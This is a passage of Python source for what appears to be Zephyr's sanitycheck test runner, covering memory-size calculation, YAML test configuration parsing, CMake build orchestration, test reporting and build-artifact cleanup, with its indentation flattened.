@return amount of RAM, in bytes
"""
return self.ram_size
def get_rom_size(self):
"""Get the size of the data that this application uses on device's flash
@return amount of ROM, in bytes
"""
return self.rom_size
def unrecognized_sections(self):
"""Get a list of sections inside the binary that weren't recognized
@return list of unrecognized section names
"""
slist = []
for v in self.sections:
if not v["recognized"]:
slist.append(v["name"])
return slist
def _calculate_sizes(self):
""" Calculate RAM and ROM usage by section """
objdump_command = "objdump -h " + self.filename
objdump_output = subprocess.check_output(
objdump_command, shell=True).decode("utf-8").splitlines()
for line in objdump_output:
words = line.split()
if not words: # Skip lines that are too short
continue
index = words[0]
if not index[0].isdigit(): # Skip lines that do not start
continue # with a digit
name = words[1] # Skip lines with section names
if name[0] == '.': # starting with '.'
continue
# TODO this doesn't actually reflect the size in flash or RAM as
# it doesn't include linker-imposed padding between sections.
# It is close though.
size = int(words[2], 16)
if size == 0:
continue
load_addr = int(words[4], 16)
virt_addr = int(words[3], 16)
# Add section to memory use totals (for both non-XIP and XIP scenarios)
# Unrecognized section names are not included in the calculations.
recognized = True
if name in SizeCalculator.alloc_sections:
self.ram_size += size
stype = "alloc"
elif name in SizeCalculator.rw_sections:
self.ram_size += size
self.rom_size += size
stype = "rw"
elif name in SizeCalculator.ro_sections:
self.rom_size += size
if not self.is_xip:
self.ram_size += size
stype = "ro"
else:
stype = "unknown"
if name not in self.extra_sections:
recognized = False
self.sections.append({"name": name, "load_addr": load_addr,
"size": size, "virt_addr": virt_addr,
"type": stype, "recognized": recognized})
class SanityConfigParser:
"""Class to read test case files with semantic checking
"""
def __init__(self, filename, schema):
"""Instantiate a new SanityConfigParser object
@param filename Source .yaml file to read
"""
self.data = {}
self.schema = schema
self.filename = filename
self.tests = {}
self.common = {}
def load(self):
self.data = scl.yaml_load_verify(self.filename, self.schema)
if 'tests' in self.data:
self.tests = self.data['tests']
if 'common' in self.data:
self.common = self.data['common']
def _cast_value(self, value, typestr):
if isinstance(value, str):
v = value.strip()
if typestr == "str":
return v
elif typestr == "float":
return float(value)
elif typestr == "int":
return int(value)
elif typestr == "bool":
return value
elif typestr.startswith("list") and isinstance(value, list):
return value
elif typestr.startswith("list") and isinstance(value, str):
vs = v.split()
if len(typestr) > 4 and typestr[4] == ":":
return [self._cast_value(vsi, typestr[5:]) for vsi in vs]
else:
return vs
elif typestr.startswith("set"):
vs = v.split()
if len(typestr) > 3 and typestr[3] == ":":
return {self._cast_value(vsi, typestr[4:]) for vsi in vs}
else:
return set(vs)
elif typestr.startswith("map"):
return value
else:
raise ConfigurationError(
self.filename, "unknown type '%s'" % value)
def get_test(self, name, valid_keys):
"""Get a dictionary representing the keys/values within a test
@param name The test in the .yaml file to retrieve data from
@param valid_keys A dictionary representing the intended semantics
for this test. Each key in this dictionary is a key that could
be specified, if a key is given in the .yaml file which isn't in
here, it will generate an error. Each value in this dictionary
is another dictionary containing metadata:
"default" - Default value if not given
"type" - Data type to convert the text value to. Simple types
supported are "str", "float", "int", "bool" which will get
converted to respective Python data types. "set" and "list"
may also be specified which will split the value by
whitespace (but keep the elements as strings). finally,
"list:<type>" and "set:<type>" may be given which will
perform a type conversion after splitting the value up.
"required" - If true, raise an error if not defined. If false
and "default" isn't specified, a type conversion will be
done on an empty string
@return A dictionary containing the test key-value pairs with
type conversion and default values filled in per valid_keys
"""
d = {}
for k, v in self.common.items():
d[k] = v
for k, v in self.tests[name].items():
if k not in valid_keys:
raise ConfigurationError(
self.filename,
"Unknown config key '%s' in definition for '%s'" %
(k, name))
if k in d:
if isinstance(d[k], str):
# By default, we just concatenate string values of keys
# which appear both in "common" and per-test sections,
# but some keys are handled in adhoc way based on their
# semantics.
if k == "filter":
d[k] = "(%s) and (%s)" % (d[k], v)
else:
d[k] += " " + v
else:
d[k] = v
for k, kinfo in valid_keys.items():
if k not in d:
if "required" in kinfo:
required = kinfo["required"]
else:
required = False
if required:
raise ConfigurationError(
self.filename,
"missing required value for '%s' in test '%s'" %
(k, name))
else:
if "default" in kinfo:
default = kinfo["default"]
else:
default = self._cast_value("", kinfo["type"])
d[k] = default
else:
try:
d[k] = self._cast_value(d[k], kinfo["type"])
except ValueError:
raise ConfigurationError(
self.filename, "bad %s value '%s' for key '%s' in name '%s'" %
(kinfo["type"], d[k], k, name))
return d
class Platform:
"""Class representing metadata for a particular platform
Maps directly to BOARD when building"""
platform_schema = scl.yaml_load(os.path.join(ZEPHYR_BASE,
"scripts", "sanity_chk", "platform-schema.yaml"))
def __init__(self):
"""Constructor.
"""
self.name = ""
self.sanitycheck = True
# if no RAM size is specified by the board, take a default of 128K
self.ram = 128
self.ignore_tags = []
self.default = False
# if no flash size is specified by the board, take a default of 512K
self.flash = 512
self.supported = set()
self.arch = ""
self.type = "na"
self.simulation = "na"
self.supported_toolchains = []
self.env = []
self.env_satisfied = True
self.filter_data = dict()
def load(self, platform_file):
scp = SanityConfigParser(platform_file, self.platform_schema)
scp.load()
data = scp.data
self.name = data['identifier']
self.sanitycheck = data.get("sanitycheck", True)
# if no RAM size is specified by the board, take a default of 128K
self.ram = data.get("ram", 128)
testing = data.get("testing", {})
self.ignore_tags = testing.get("ignore_tags", [])
self.default = testing.get("default", False)
# if no flash size is specified by the board, take a default of 512K
self.flash = data.get("flash", 512)
self.supported = set()
for supp_feature in data.get("supported", []):
for item in supp_feature.split(":"):
self.supported.add(item)
self.arch = data['arch']
self.type = data.get('type', "na")
self.simulation = data.get('simulation', "na")
self.supported_toolchains = data.get("toolchain", [])
self.env = data.get("env", [])
self.env_satisfied = True
for env in self.env:
if not os.environ.get(env, None):
self.env_satisfied = False
def __repr__(self):
return "<%s on %s>" % (self.name, self.arch)
class DisablePyTestCollectionMixin(object):
__test__ = False
class TestCase(DisablePyTestCollectionMixin):
"""Class representing a test application
"""
def __init__(self, testcase_root, workdir, name):
"""TestCase constructor.
This gets called by TestSuite as it finds and reads test yaml files.
Multiple TestCase instances may be generated from a single testcase.yaml,
each one corresponds to an entry within that file.
We need to have a unique name for every single test case. Since
a testcase.yaml can define multiple tests, the canonical name for
the test case is <workdir>/<name>.
@param testcase_root os.path.abspath() of one of the --testcase-root
@param workdir Sub-directory of testcase_root where the
.yaml test configuration file was found
@param name Name of this test case, corresponding to the entry name
in the test case configuration file. For many test cases that just
define one test, can be anything and is usually "test". This is
really only used to distinguish between different cases when
the testcase.yaml defines multiple tests
"""
self.source_dir = ""
self.yamlfile = ""
self.cases = []
self.name = self.get_unique(testcase_root, workdir, name)
self.id = name
self.type = None
self.tags = set()
self.extra_args = None
self.extra_configs = None
self.arch_whitelist = None
self.arch_exclude = None
self.skip = False
self.platform_exclude = None
self.platform_whitelist = None
self.toolchain_exclude = None
self.toolchain_whitelist = None
self.tc_filter = None
self.timeout = 60
self.harness = ""
self.harness_config = {}
self.build_only = True
self.build_on_all = False
self.slow = False
self.min_ram = -1
self.depends_on = None
self.min_flash = -1
self.extra_sections = None
@staticmethod
def get_unique(testcase_root, workdir, name):
canonical_testcase_root = os.path.realpath(testcase_root)
if Path(canonical_zephyr_base) in Path(canonical_testcase_root).parents:
# This is in ZEPHYR_BASE, so include path in name for uniqueness
# FIXME: We should not depend on path of test for unique names.
relative_tc_root = os.path.relpath(canonical_testcase_root,
start=canonical_zephyr_base)
else:
relative_tc_root = ""
# workdir can be "."
unique = os.path.normpath(os.path.join(relative_tc_root, workdir, name))
check = name.split(".")
if len(check) < 2:
raise SanityCheckException(f"""bad test name '{name}' in {testcase_root}/{workdir}. \
Tests should reference the category and subsystem with a dot as a separator.
"""
)
return unique
@staticmethod
def scan_file(inf_name):
suite_regex = re.compile(
# do not match until end-of-line, otherwise we won't allow
# stc_regex below to catch the ones that are declared in the same
# line--as we only search starting the end of this match
br"^\s*ztest_test_suite\(\s*(?P<suite_name>[a-zA-Z0-9_]+)\s*,",
re.MULTILINE)
stc_regex = re.compile(
br"^\s*" # empy space at the beginning is ok
# catch the case where it is declared in the same sentence, e.g:
#
# ztest_test_suite(mutex_complex, ztest_user_unit_test(TESTNAME));
br"(?:ztest_test_suite\([a-zA-Z0-9_]+,\s*)?"
# Catch ztest[_user]_unit_test-[_setup_teardown](TESTNAME)
br"ztest_(?:1cpu_)?(?:user_)?unit_test(?:_setup_teardown)?"
# Consume the argument that becomes the extra testcse
br"\(\s*"
br"(?P<stc_name>[a-zA-Z0-9_]+)"
# _setup_teardown() variant has two extra arguments that we ignore
br"(?:\s*,\s*[a-zA-Z0-9_]+\s*,\s*[a-zA-Z0-9_]+)?"
br"\s*\)",
# We don't check how it finishes; we don't care
re.MULTILINE)
suite_run_regex = re.compile(
br"^\s*ztest_run_test_suite\((?P<suite_name>[a-zA-Z0-9_]+)\)",
re.MULTILINE)
achtung_regex = re.compile(
br"(#ifdef|#endif)",
re.MULTILINE)
warnings = None
with open(inf_name) as inf:
if os.name == 'nt':
mmap_args = {'fileno': inf.fileno(), 'length': 0, 'access': mmap.ACCESS_READ}
else:
mmap_args = {'fileno': inf.fileno(), 'length': 0, 'flags': mmap.MAP_PRIVATE, 'prot': mmap.PROT_READ,
'offset': 0}
with contextlib.closing(mmap.mmap(**mmap_args)) as main_c:
# contextlib makes pylint think main_c isn't subscriptable
# pylint: disable=unsubscriptable-object
suite_regex_match = suite_regex.search(main_c)
if not suite_regex_match:
# can't find ztest_test_suite, maybe a client, because
# it includes ztest.h
return None, None
suite_run_match = suite_run_regex.search(main_c)
if not suite_run_match:
raise ValueError("can't find ztest_run_test_suite")
achtung_matches = re.findall(
achtung_regex,
main_c[suite_regex_match.end():suite_run_match.start()])
if achtung_matches:
warnings = "found invalid %s in ztest_test_suite()" \
% ", ".join({match.decode() for match in achtung_matches})
_matches = re.findall(
stc_regex,
main_c[suite_regex_match.end():suite_run_match.start()])
for match in _matches:
if not match.decode().startswith("test_"):
warnings = "Found a test that does not start with test_"
matches = [match.decode().replace("test_", "") for match in _matches]
return matches, warnings
def scan_path(self, path):
subcases = []
for filename in glob.glob(os.path.join(path, "src", "*.c*")):
try:
_subcases, warnings = self.scan_file(filename)
if warnings:
logger.error("%s: %s" % (filename, warnings))
raise SanityRuntimeError("%s: %s" % (filename, warnings))
if _subcases:
subcases += _subcases
except ValueError as e:
logger.error("%s: can't find: %s" % (filename, e))
for filename in glob.glob(os.path.join(path, "*.c")):
try:
_subcases, warnings = self.scan_file(filename)
if warnings:
logger.error("%s: %s" % (filename, warnings))
if _subcases:
subcases += _subcases
except ValueError as e:
logger.error("%s: can't find: %s" % (filename, e))
return subcases
def parse_subcases(self, test_path):
results = self.scan_path(test_path)
for sub in results:
name = "{}.{}".format(self.id, sub)
self.cases.append(name)
if not results:
self.cases.append(self.id)
def __str__(self):
return self.name
class TestInstance(DisablePyTestCollectionMixin):
"""Class representing the execution of a particular TestCase on a platform
@param test The TestCase object we want to build/execute
@param platform Platform object that we want to build and run against
@param base_outdir Base directory for all test results. The actual
out directory used is <outdir>/<platform>/<test case name>
"""
def __init__(self, testcase, platform, outdir):
self.testcase = testcase
self.platform = platform
self.status = None
self.reason = "Unknown"
self.metrics = dict()
self.handler = None
self.outdir = outdir
self.name = os.path.join(platform.name, testcase.name)
self.build_dir = os.path.join(outdir, platform.name, testcase.name)
self.build_only = True
self.run = False
self.results = {}
def __lt__(self, other):
return self.name < other.name
# Global testsuite parameters
def check_build_or_run(self, build_only=False, enable_slow=False, device_testing=False, fixtures=[]):
# right now we only support building on windows. running is still work
# in progress.
if os.name == 'nt':
self.build_only = True
self.run = False
return
_build_only = True
# we asked for build-only on the command line
if build_only or self.testcase.build_only:
self.build_only = True
self.run = False
return
# Do not run slow tests:
skip_slow = self.testcase.slow and not enable_slow
if skip_slow:
self.build_only = True
self.run = False
return
runnable = bool(self.testcase.type == "unit" or \
self.platform.type == "native" or \
self.platform.simulation in ["nsim", "renode", "qemu"] or \
device_testing)
if self.platform.simulation == "nsim":
if not find_executable("nsimdrv"):
runnable = False
if self.platform.simulation == "renode":
if not find_executable("renode"):
runnable = False
# console harness allows us to run the test and capture data.
if self.testcase.harness in [ 'console', 'ztest']:
# if we have a fixture that is also being supplied on the
# command-line, then we need to run the test, not just build it.
fixture = self.testcase.harness_config.get('fixture')
if fixture:
if fixture in fixtures:
_build_only = False
else:
_build_only = True
else:
_build_only = False
elif self.testcase.harness:
_build_only = True
else:
_build_only = False
self.build_only = not (not _build_only and runnable)
self.run = not self.build_only
return
def create_overlay(self, platform, enable_asan=False, enable_coverage=False, coverage_platform=[]):
# Create this in a "sanitycheck/" subdirectory otherwise this
# will pass this overlay to kconfig.py *twice* and kconfig.cmake
# will silently give that second time precedence over any
# --extra-args=CONFIG_*
subdir = os.path.join(self.build_dir, "sanitycheck")
os.makedirs(subdir, exist_ok=True)
file = os.path.join(subdir, "testcase_extra.conf")
with open(file, "w") as f:
content = ""
if self.testcase.extra_configs:
content = "\n".join(self.testcase.extra_configs)
if enable_coverage:
if platform.name in coverage_platform:
content = content + "\nCONFIG_COVERAGE=y"
content = content + "\nCONFIG_COVERAGE_DUMP=y"
if enable_asan:
if platform.type == "native":
content = content + "\nCONFIG_ASAN=y"
f.write(content)
return content
def calculate_sizes(self):
"""Get the RAM/ROM sizes of a test case.
This can only be run after the instance has been executed by
MakeGenerator, otherwise there won't be any binaries to measure.
@return A SizeCalculator object
"""
fns = glob.glob(os.path.join(self.build_dir, "zephyr", "*.elf"))
fns.extend(glob.glob(os.path.join(self.build_dir, "zephyr", "*.exe")))
fns = [x for x in fns if not x.endswith('_prebuilt.elf')]
if len(fns) != 1:
raise BuildError("Missing/multiple output ELF binary")
return SizeCalculator(fns[0], self.testcase.extra_sections)
def __repr__(self):
return "<TestCase %s on %s>" % (self.testcase.name, self.platform.name)
class CMake():
config_re = re.compile('(CONFIG_[A-Za-z0-9_]+)[=]\"?([^\"]*)\"?$')
dt_re = re.compile('([A-Za-z0-9_]+)[=]\"?([^\"]*)\"?$')
def __init__(self, testcase, platform, source_dir, build_dir):
self.cwd = None
self.capture_output = True
self.defconfig = {}
self.cmake_cache = {}
self.instance = None
self.testcase = testcase
self.platform = platform
self.source_dir = source_dir
self.build_dir = build_dir
self.log = "build.log"
self.generator = None
self.generator_cmd = None
def parse_generated(self):
self.defconfig = {}
return {}
def run_build(self, args=[]):
logger.debug("Building %s for %s" % (self.source_dir, self.platform.name))
cmake_args = []
cmake_args.extend(args)
cmake = shutil.which('cmake')
cmd = [cmake] + cmake_args
kwargs = dict()
if self.capture_output:
kwargs['stdout'] = subprocess.PIPE
# CMake sends the output of message() to stderr unless it's STATUS
kwargs['stderr'] = subprocess.STDOUT
if self.cwd:
kwargs['cwd'] = self.cwd
p = subprocess.Popen(cmd, **kwargs)
out, _ = p.communicate()
results = {}
if p.returncode == 0:
msg = "Finished building %s for %s" % (self.source_dir, self.platform.name)
self.instance.status = "passed"
results = {'msg': msg, "returncode": p.returncode, "instance": self.instance}
if out:
log_msg = out.decode(sys.getdefaultencoding())
with open(os.path.join(self.build_dir, self.log), "a") as log:
log.write(log_msg)
else:
return None
else:
# A real error occurred, raise an exception
if out:
log_msg = out.decode(sys.getdefaultencoding())
with open(os.path.join(self.build_dir, self.log), "a") as log:
log.write(log_msg)
if log_msg:
res = re.findall("region `(FLASH|RAM|SRAM)' overflowed by", log_msg)
if res:
logger.debug("Test skipped due to {} Overflow".format(res[0]))
self.instance.status = "skipped"
self.instance.reason = "{} overflow".format(res[0])
else:
self.instance.status = "failed"
self.instance.reason = "Build failure"
results = {
"returncode": p.returncode,
"instance": self.instance,
}
return results
def run_cmake(self, args=[]):
ldflags = "-Wl,--fatal-warnings"
logger.debug("Running cmake on %s for %s" % (self.source_dir, self.platform.name))
# fixme: add additional cflags based on options
cmake_args = [
'-B{}'.format(self.build_dir),
'-S{}'.format(self.source_dir),
'-DEXTRA_CFLAGS="-Werror ',
'-DEXTRA_AFLAGS=-Wa,--fatal-warnings',
'-DEXTRA_LDFLAGS="{}'.format(ldflags),
'-G{}'.format(self.generator)
]
if self.cmake_only:
cmake_args.append("-DCMAKE_EXPORT_COMPILE_COMMANDS=1")
args = ["-D{}".format(a.replace('"', '')) for a in args]
cmake_args.extend(args)
cmake_opts = ['-DBOARD={}'.format(self.platform.name)]
cmake_args.extend(cmake_opts)
logger.debug("Calling cmake with arguments: {}".format(cmake_args))
cmake = shutil.which('cmake')
cmd = [cmake] + cmake_args
kwargs = dict()
if self.capture_output:
kwargs['stdout'] = subprocess.PIPE
# CMake sends the output of message() to stderr unless it's STATUS
kwargs['stderr'] = subprocess.STDOUT
if self.cwd:
kwargs['cwd'] = self.cwd
p = subprocess.Popen(cmd, **kwargs)
out, _ = p.communicate()
if p.returncode == 0:
filter_results = self.parse_generated()
msg = "Finished building %s for %s" % (self.source_dir, self.platform.name)
logger.debug(msg)
results = {'msg': msg, 'filter': filter_results}
else:
self.instance.status = "failed"
self.instance.reason = "Cmake build failure"
logger.error("Cmake build failure: %s for %s" % (self.source_dir, self.platform.name))
results = {"returncode": p.returncode}
if out:
with open(os.path.join(self.build_dir, self.log), "a") as log:
log_msg = out.decode(sys.getdefaultencoding())
log.write(log_msg)
return results
class FilterBuilder(CMake):
def __init__(self, testcase, platform, source_dir, build_dir):
super().__init__(testcase, platform, source_dir, build_dir)
self.log = "config-sanitycheck.log"
def parse_generated(self):
if self.platform.name == "unit_testing":
return {}
cmake_cache_path = os.path.join(self.build_dir, "CMakeCache.txt")
defconfig_path = os.path.join(self.build_dir, "zephyr", ".config")
with open(defconfig_path, "r") as fp:
defconfig = {}
for line in fp.readlines():
m = self.config_re.match(line)
if not m:
if line.strip() and not line.startswith("#"):
sys.stderr.write("Unrecognized line %s\n" % line)
continue
defconfig[m.group(1)] = m.group(2).strip()
self.defconfig = defconfig
cmake_conf = {}
try:
cache = CMakeCache.from_file(cmake_cache_path)
except FileNotFoundError:
cache = {}
for k in iter(cache):
cmake_conf[k.name] = k.value
self.cmake_cache = cmake_conf
filter_data = {
"ARCH": self.platform.arch,
"PLATFORM": self.platform.name
}
filter_data.update(os.environ)
filter_data.update(self.defconfig)
filter_data.update(self.cmake_cache)
dts_path = os.path.join(self.build_dir, "zephyr", self.platform.name + ".dts.pre.tmp")
if self.testcase and self.testcase.tc_filter:
try:
if os.path.exists(dts_path):
edt = edtlib.EDT(dts_path, [os.path.join(ZEPHYR_BASE, "dts", "bindings")],
warn_reg_unit_address_mismatch=False)
else:
edt = None
res = expr_parser.parse(self.testcase.tc_filter, filter_data, edt)
except (ValueError, SyntaxError) as se:
sys.stderr.write(
"Failed processing %s\n" % self.testcase.yamlfile)
raise se
if not res:
return {os.path.join(self.platform.name, self.testcase.name): True}
else:
return {os.path.join(self.platform.name, self.testcase.name): False}
else:
self.platform.filter_data = filter_data
return filter_data
class ProjectBuilder(FilterBuilder):
def __init__(self, suite, instance, **kwargs):
super().__init__(instance.testcase, instance.platform, instance.testcase.source_dir, instance.build_dir)
self.log = "build.log"
self.instance = instance
self.suite = suite
self.lsan = kwargs.get('lsan', False)
self.asan = kwargs.get('asan', False)
self.valgrind = kwargs.get('valgrind', False)
self.extra_args = kwargs.get('extra_args', [])
self.device_testing = kwargs.get('device_testing', False)
self.cmake_only = kwargs.get('cmake_only', False)
self.cleanup = kwargs.get('cleanup', False)
self.coverage = kwargs.get('coverage', False)
self.inline_logs = kwargs.get('inline_logs', False)
self.generator = kwargs.get('generator', None)
self.generator_cmd = kwargs.get('generator_cmd', None)
self.verbose = kwargs.get('verbose', None)
@staticmethod
def log_info(filename, inline_logs):
filename = os.path.abspath(os.path.realpath(filename))
if inline_logs:
logger.info("{:-^100}".format(filename))
try:
with open(filename) as fp:
data = fp.read()
except Exception as e:
data = "Unable to read log data (%s)\n" % (str(e))
logger.error(data)
logger.info("{:-^100}".format(filename))
else:
logger.error("see: " + Fore.YELLOW + filename + Fore.RESET)
def log_info_file(self, inline_logs):
build_dir = self.instance.build_dir
h_log = "{}/handler.log".format(build_dir)
b_log = "{}/build.log".format(build_dir)
v_log = "{}/valgrind.log".format(build_dir)
d_log = "{}/device.log".format(build_dir)
if os.path.exists(v_log) and "Valgrind" in self.instance.reason:
self.log_info("{}".format(v_log), inline_logs)
elif os.path.exists(h_log) and os.path.getsize(h_log) > 0:
self.log_info("{}".format(h_log), inline_logs)
elif os.path.exists(d_log) and os.path.getsize(d_log) > 0:
self.log_info("{}".format(d_log), inline_logs)
else:
self.log_info("{}".format(b_log), inline_logs)
def setup_handler(self):
instance = self.instance
args = []
# FIXME: Needs simplification
if instance.platform.simulation == "qemu":
instance.handler = QEMUHandler(instance, "qemu")
args.append("QEMU_PIPE=%s" % instance.handler.get_fifo())
instance.handler.call_make_run = True
elif instance.testcase.type == "unit":
instance.handler = BinaryHandler(instance, "unit")
instance.handler.binary = os.path.join(instance.build_dir, "testbinary")
if self.coverage:
args.append("COVERAGE=1")
elif instance.platform.type == "native":
handler = BinaryHandler(instance, "native")
handler.asan = self.asan
handler.valgrind = self.valgrind
handler.lsan = self.lsan
handler.coverage = self.coverage
handler.binary = os.path.join(instance.build_dir, "zephyr", "zephyr.exe")
instance.handler = handler
elif instance.platform.simulation == "nsim":
if find_executable("nsimdrv"):
instance.handler = BinaryHandler(instance, "nsim")
instance.handler.call_make_run = True
elif instance.platform.simulation == "renode":
if find_executable("renode"):
instance.handler = BinaryHandler(instance, "renode")
instance.handler.pid_fn = os.path.join(instance.build_dir, "renode.pid")
instance.handler.call_make_run = True
elif self.device_testing:
instance.handler = DeviceHandler(instance, "device")
if instance.handler:
instance.handler.args = args
instance.handler.generator_cmd = self.generator_cmd
instance.handler.generator = self.generator
def process(self, message):
op = message.get('op')
if not self.instance.handler:
self.setup_handler()
# The build process, call cmake and build with configured generator
if op == "cmake":
results = self.cmake()
if self.instance.status == "failed":
pipeline.put({"op": "report", "test": self.instance})
elif self.cmake_only:
pipeline.put({"op": "report", "test": self.instance})
else:
if self.instance.name in results['filter'] and results['filter'][self.instance.name]:
logger.debug("filtering %s" % self.instance.name)
self.instance.status = "skipped"
self.instance.reason = "filter"
for case in self.instance.testcase.cases:
self.instance.results.update({case: 'SKIP'})
pipeline.put({"op": "report", "test": self.instance})
else:
pipeline.put({"op": "build", "test": self.instance})
elif op == "build":
logger.debug("build test: %s" % self.instance.name)
results = self.build()
if not results:
self.instance.status = "failed"
self.instance.reason = "Build Failure"
pipeline.put({"op": "report", "test": self.instance})
else:
if results.get('returncode', 1) > 0:
pipeline.put({"op": "report", "test": self.instance})
else:
if self.instance.run:
pipeline.put({"op": "run", "test": self.instance})
else:
pipeline.put({"op": "report", "test": self.instance})
# Run the generated binary using one of the supported handlers
elif op == "run":
logger.debug("run test: %s" % self.instance.name)
self.run()
self.instance.status, _ = self.instance.handler.get_state()
pipeline.put({
"op": "report",
"test": self.instance,
"state": "executed",
"status": self.instance.status,
"reason": self.instance.reason}
)
# Report results and output progress to screen
elif op == "report":
with report_lock:
self.report_out()
if self.cleanup and not self.coverage and self.instance.status == "passed":
pipeline.put({
"op": "cleanup",
"test": self.instance
})
elif op == "cleanup":
self.cleanup_artifacts()
def cleanup_artifacts(self):
logger.debug("Cleaning up {}".format(self.instance.build_dir))
whitelist = [
'zephyr/.config',
'handler.log',
'build.log',
'device.log',
'recording.csv',
]
whitelist = [os.path.join(self.instance.build_dir, file) for file in whitelist]
for dirpath, dirnames, filenames in os.walk(self.instance.build_dir, topdown=False):
for name in filenames:
path = os.path.join(dirpath, name)
if path not in whitelist:
os.remove(path)
# Remove empty directories and symbolic links to directories
for dir in dirnames:
path = os.path.join(dirpath, dir)
if os.path.islink(path):
os.remove(path)
elif not os.listdir(path):
os.rmdir(path)
def report_out(self):
total_tests_width = len(str(self.suite.total_tests))
self.suite.total_done += 1
instance = self.instance
if instance.status in ["failed", "timeout"]:
self.suite.total_failed += 1
if self.verbose:
status = Fore.RED + "FAILED " + Fore.RESET + instance.reason
else:
print("")
logger.error(
"{:<25} {:<50} {}FAILED{}: {}".format(
instance.platform.name,
instance.testcase.name,
Fore.RED,
Fore.RESET,
instance.reason))
if not self.verbose:
self.log_info_file(self.inline_logs)
elif instance.status == "skipped":
self.suite.total_skipped += 1
status = Fore.YELLOW + "SKIPPED" + Fore.RESET
else:
status = Fore.GREEN + "PASSED" + Fore.RESET
if self.verbose:
if self.cmake_only:
more_info = "cmake"
elif instance.status == "skipped":
more_info = instance.reason
else:
if instance.handler and instance.run:
more_info = instance.handler.type_str
htime = instance.handler.duration
if htime:
more_info += " {:.3f}s".format(htime)
else:
more_info = "build"
logger.info("{:>{}}/{} {:<25} {:<50} {} ({})".format(
self.suite.total_done, total_tests_width, self.suite.total_tests, instance.platform.name,
instance.testcase.name, status, more_info))
if instance.status in ["failed", "timeout"]:
self.log_info_file(self.inline_logs)
else:
sys.stdout.write("\rINFO - Total complete: %s%4d/%4d%s %2d%% skipped: %s%4d%s, failed: %s%4d%s" % (
Fore.GREEN,
self.suite.total_done,
self.suite.total_tests,
Fore.RESET,
int((float(self.suite.total_done) / self.suite.total_tests) * 100),
Fore.YELLOW if self.suite.total_skipped > 0 else Fore.RESET,
self.suite.total_skipped,
Fore.RESET,
Fore.RED if self.suite.total_failed > 0 else Fore.RESET,
self.suite.total_failed,
Fore.RESET
)
)
sys.stdout.flush()
def cmake(self):
instance = self.instance
args = self.testcase.extra_args[:]
args += self.extra_args
if instance.handler:
args += instance.handler.args
# merge overlay files into one variable
def extract_overlays(args):
re_overlay = re.compile('OVERLAY_CONFIG=(.*)')
other_args = []
overlays = []
for arg in args:
match = re_overlay.search(arg)
if match:
overlays.append(match.group(1).strip('\'"'))
else:
other_args.append(arg)
args[:] = other_args
return overlays
overlays = extract_overlays(args)
if (self.testcase.extra_configs or self.coverage or
self.asan):
overlays.append(os.path.join(instance.build_dir,
"sanitycheck", "testcase_extra.conf"))
if overlays:
args.append("OVERLAY_CONFIG=\"%s\"" % (" ".join(overlays)))
results = self.run_cmake(args)
return results
def build(self):
results = self.run_build(['--build', self.build_dir])
return results
def run(self):
instance = self.instance
if instance.handler.type_str == "device":
instance.handler.suite = self.suite
instance.handler.handle()
sys.stdout.flush()
class BoundedExecutor(concurrent.futures.ThreadPoolExecutor):
"""BoundedExecutor behaves as a ThreadPoolExecutor which will block on
calls to submit() once the limit given as "bound" work items are queued for
execution.
:param bound: Integer - the maximum number of items in the work queue
:param max_workers: Integer - the size of the thread pool
"""
def __init__(self, bound, max_workers, **kwargs):
super().__init__(max_workers)
# self.executor = ThreadPoolExecutor(max_workers=max_workers)
self.semaphore = BoundedSemaphore(bound + max_workers)
def submit(self, fn, *args, **kwargs):
self.semaphore.acquire()
try:
future = super().submit(fn, *args, **kwargs)
except Exception:
self.semaphore.release()
raise
else:
future.add_done_callback(lambda x: self.semaphore.release())
return future
class TestSuite(DisablePyTestCollectionMixin):
config_re = re.compile('(CONFIG_[A-Za-z0-9_]+)[=]\"?([^\"]*)\"?$')
dt_re = re.compile('([A-Za-z0-9_]+)[=]\"?([^\"]*)\"?$')
tc_schema = scl.yaml_load(
os.path.join(ZEPHYR_BASE,
"scripts", "sanity_chk", "testcase-schema.yaml"))
testcase_valid_keys = {"tags": {"type": "set", "required": False},
"type": {"type": "str", "default": "integration"},
"extra_args": {"type": "list"},
"extra_configs": {"type": "list"},
"build_only": {"type": "bool", "default": False},
"build_on_all": {"type": "bool", "default": False},
"skip": {"type": "bool", "default": False},
"slow": {"type": "bool", "default": False},
"timeout": {"type": "int", "default": 60},
"min_ram": {"type": "int", "default": 8},
"depends_on": {"type": "set"},
"min_flash": {"type": "int", "default": 32},
"arch_whitelist": {"type": "set"},
"arch_exclude": {"type": "set"},
"extra_sections": {"type": "list", "default": []},
"platform_exclude": {"type": "set"},
"platform_whitelist": {"type": "set"},
"toolchain_exclude": {"type": "set"},
"toolchain_whitelist": {"type": "set"},
"filter": {"type": "str"},
"harness": {"type": "str"},
"harness_config": {"type": "map", "default": {}}
}
RELEASE_DATA = os.path.join(ZEPHYR_BASE, "scripts", "sanity_chk",
"sanity_last_release.csv")
SAMPLE_FILENAME = 'sample.yaml'
TESTCASE_FILENAME = 'testcase.yaml'
def __init__(self, board_root_list=[], testcase_roots=[], outdir=None):
self.roots = testcase_roots
if not isinstance(board_root_list, list):
self.board_roots = [board_root_list]
else:
self.board_roots = board_root_list
# Testsuite Options
self.coverage_platform = []
self.build_only = False
self.cmake_only = False
self.cleanup = False
self.enable_slow = False
self.device_testing = False
self.fixtures = []
self.enable_coverage = False
self.enable_lsan = False
self.enable_asan = False
self.enable_valgrind = False
self.extra_args = []
self.inline_logs = False
self.enable_sizes_report = False
self.west_flash = None
self.west_runner = None
self.generator = None
self.generator_cmd = None
# Keep track of which test cases we've filtered out and why
self.testcases = {}
self.platforms = []
self.selected_platforms = []
self.default_platforms = []
self.outdir = os.path.abspath(outdir)
self.discards = {}
self.load_errors = 0
self.instances = dict()
self.total_tests = 0 # number of test instances
self.total_cases = 0 # number of test cases
self.total_done = 0 # tests completed
self.total_failed = 0
self.total_skipped = 0
self.total_platforms = 0
self.start_time = 0
self.duration = 0
self.warnings = 0
self.cv = threading.Condition()
# hardcoded for now
self.connected_hardware = []
def get_platform_instances(self, platform):
filtered_dict = {k:v for k,v in self.instances.items() if k.startswith(platform + "/")}
return filtered_dict
def config(self):
logger.info("coverage platform: {}".format(self.coverage_platform))
# Debug Functions
@staticmethod
def info(what):
sys.stdout.write(what + "\n")
sys.stdout.flush()
def update(self):
self.total_tests = len(self.instances)
self.total_cases = len(self.testcases)
def compare_metrics(self, filename):
# name, datatype, lower results better
interesting_metrics = [("ram_size", int, True),
("rom_size", int, True)]
if not os.path.exists(filename):
logger.info("Cannot compare metrics, %s not found" % filename)
return []
results = []
saved_metrics = {}
with open(filename) as fp:
cr = csv.DictReader(fp)
for row in cr:
d = {}
